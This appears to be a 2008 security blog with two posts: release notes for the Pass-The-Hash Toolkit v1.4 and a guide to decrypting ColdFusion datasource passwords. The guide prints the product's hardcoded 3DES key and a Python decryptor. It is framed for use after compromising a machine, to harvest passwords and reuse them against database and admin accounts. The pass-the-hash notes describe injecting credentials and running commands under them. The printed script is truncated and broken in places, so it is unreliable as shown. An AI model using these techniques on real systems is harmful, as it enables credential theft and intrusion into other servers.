Wednesday, July 02, 2008

Release of Pass-The-Hash Toolkit v1.4

Source Code:
http://oss.coresecurity.com/pshtoolkit/release/1.4/pshtoolkit_v1.4-src.tgz

Win32 Binaries:
http://oss.coresecurity.com/pshtoolkit/release/1.4/pshtoolkit_v1.4.tgz

Documentation/info:
http://oss.coresecurity.com/projects/pshtoolkit.htm
http://oss.coresecurity.com/pshtoolkit/doc/index.html
http://hexale.blogspot.com
http://www.hexale.org/forums

What's new?:
(http://oss.coresecurity.com/pshtoolkit/release/1.4/WHATSNEW)

*Support for XP SP 3 for whosthere/iam (whosthere-alt/iam-alt work on xp sp3
without requiring any update)

*New -t switch for whosthere/whosthere-alt: establishes interval used by the -i switch (by default 2 seconds).

*New -a switch for whosthere/iam: specify addresses to use. Format: ADDCREDENTIAL_ADDR:ENCRYPTMEMORY_ADDR:FEEDBACK_ADDR:DESKEY_ADDR:LOGONSESSIONLIST_ADDR:LOGONSESSIONLIST_COUNT_ADDR (WARNING!: if you use the wrong values the system may crash)
The idea is that, if you find yourself in a version of Windows where
whosthere/iam don't work (and iam-alt/whosthere-alt don't work either); you can run LSASRV.DLL thru IDA, run the PASSTHEHASH.IDC script included in the Pass-The-Hash toolkit, and use the addresses found by the script with the -a switch.

This basically allows you to specify addresses at runtime to whosthere whithout
the need to recompile the tool.

*New -r switch for iam/iam-alt: Create a new logon session and run a command with
the specified credentials (e.g.: -r cmd.exe)

*genhash now outputs hashes using the LM HASH:NT HASH format

*several bugfixes and stuff

Tuesday, July 01, 2008

How to decrypt Coldfusion datasource passwords

ColdFusion stores passwords for DataSources encrypted in the following XML files:
  • Coldfusion 7: \lib\neo-query.xml

for example: c:\CFusionMX7\lib\neo-query.xml

  • Coldfusion 8: \lib\neo-datasource.xml

for example: c:\coldfusion8\lib\neo-datasource.xml


the xml contains nodes/items like this:

<var name="password">
<string>maJsuHYMay8zpmptC2yibA==</string>

one for every data source.


Both Coldfusion versions use the same mechanism to encrypt the passwords;
this mechanism can be found in the following way:


  • Find \lib\cfusion.jar
  • Extract its contents
  • Decompile \coldfusion\sql\DataSourceDef.class

(use for example: cavaj Java decompiler: http://www.sureshotsoftware.com/cavaj/index.html)

You'll find the following code:


[..]
public class DataSourceDef {

[..]

protected static final String seedval = "0yJ!@1$r8p0L@r1$6yJ!@1rj";

[..]

protected String getPassword() {

if(password == null) { return null; }

if(password.equals("")) { return ""; }

else {

String pwd = null; String secKey = CFPage.generate3DesKey("0yJ!@1$r8p0L@r1$6yJ!@1rj"); pwd = CFPage.Decrypt(password, secKey, "DESede", "Base64"); return pwd;

}

}

[..]

And here's a simple script that will decrypt the passwords:

[..]

import pyDes
import base64
import sys


print "Coldfusion v7 y v8 DataSource password decryptor (c) 2008 Hernan Ochoa (hernan@gmail.com)"
print " "

if len(sys.argv) <>
print "syntax: coldfusion_ds_decrypt.py "
exit(0)

pwd = sys.argv[1]
key = "0yJ!@1$r8p0L@r1$6yJ!@1rj"

k = pyDes.triple_des(key)
d = k.decrypt( base64.decodestring(pwd), "*")

print "decrypted password: " + d



[..]

If you have compromised a machine with Coldfusion, you might find
useful to have these passwords to test them against the database server
and other servers (if you have control over the Coldfusion installation,
you can already execute sql code using cfm without knowing the password
for the datasource; but STILL it might be good to have these passwords,to access the database servers directly, they might be the same as the ones used for other remote admin accounts, etc
(I've seen it and I'm sure you have seen it too)).

If you have access to the Coldfusion administrator page (http://target/CFIDE/Administrator) you can go to the datasources section and you'll see the base64-encoded encrypted password for all the datasources.

Go to the 'DataSources Section'


Click on a 'DataSource' (e.g.: Test)


Look at the source code for the HTML page:




This is another method for obtaining the base64-encoded encrypted passwords,
instead of going to the XML files on disk.

Of course, if you have access to the administrator console already, you can do pretty much everything; I'm just saying this is a convenient method to obtain the password for later decryption.